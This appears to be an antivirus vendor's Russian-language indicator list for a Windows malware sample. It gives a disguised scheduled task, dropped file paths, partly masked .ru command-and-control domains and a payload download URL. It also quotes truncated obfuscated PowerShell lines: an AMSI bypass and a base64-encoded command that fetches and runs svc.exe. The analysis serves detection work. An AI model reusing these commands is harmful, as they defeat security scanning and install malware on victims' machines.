Техническая информация
- <SYSTEM32>\tasks\firefox default browser agent fee92093c5a86ce1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi...
- C:\users\public\libraries\svc.exe
- %APPDATA%\fdggssi
- %APPDATA%\fdggssi
- C:\users\public\libraries\svc.exe
- 'go######ersportuni##m.ru':80
- 'al######arusmulticopter.ru':80
- 'st#####roculturnaya.ru':80
- http://go######ersportuni##m.ru/load/svc.exe
- http://al######arusmulticopter.ru/index.php
- http://st#####roculturnaya.ru/index.php
- DNS ASK go######ersportuni##m.ru
- DNS ASK al######arusmulticopter.ru
- DNS ASK jo######coninteraption.ru
- DNS ASK st#####roculturnaya.ru
- 'C:\users\public\libraries\svc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E JABVAFUAVQAgAD0AIAAnAGgAdAB0AHAAOgAvAC8AZwBvAG8AZABtAGEAcwB0AGUAcgBzAHAAbwByAHQAdQBuAGkAYwB1AG0ALgByAHUALwBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnADsAIAAkAFAAUABQACAAPQAgACcAQwA6AFwAVQBzAGUAcgBzAF...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils';$DFi... (со скрытым окном)